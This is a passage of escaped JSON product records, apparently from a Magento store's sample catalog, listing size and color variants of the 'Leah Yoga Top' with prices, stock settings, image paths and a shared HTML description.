Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"1692\":{\"sku\":\"WT05-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-M-Orange\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1693\":{\"sku\":\"WT05-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-M-Purple\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1694\":{\"sku\":\"WT05-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-M-White\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"1695\":{\"sku\":\"WT05-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-L-Orange\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"1696\":{\"sku\":\"WT05-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-L-Purple\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"1697\":{\"sku\":\"WT05-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-L-White\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"1698\":{\"sku\":\"WT05-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-XL-Orange\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"1699\":{\"sku\":\"WT05-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Bras & Tanks,Default Category\\/Collections\\/Erin Recommends,Default Category\",\"product_websites\":\"base\",\"name\":\"Leah Yoga Top-XL-Purple\",\"description\":\"<p>The Leah Yoga Top offers a practical, comfortable upper that will not compromise your style. Body hugging fit and interior shelf bra make it suitable for active or leisure pursuits.<\\/p>\\n<p>&bull; Blue heather rouched tank top.<br \\/>&bull; Camisole tank top.<br \\/>&bull; Banding and shirring details.<br \\/>&bull; Body hugging fit.<br \\/>&bull; Contrast topstitch.<br \\/>&bull; Interior shelf bra with shapewear technology.<br \\/>&bull; 65% Polyester 35% Cotton.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"39\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"leah-yoga-top-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"image\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/t\\/wt05-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/t\\/wt05-purple_alt1.jpg,\\/w\\/t\\/wt05-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_fro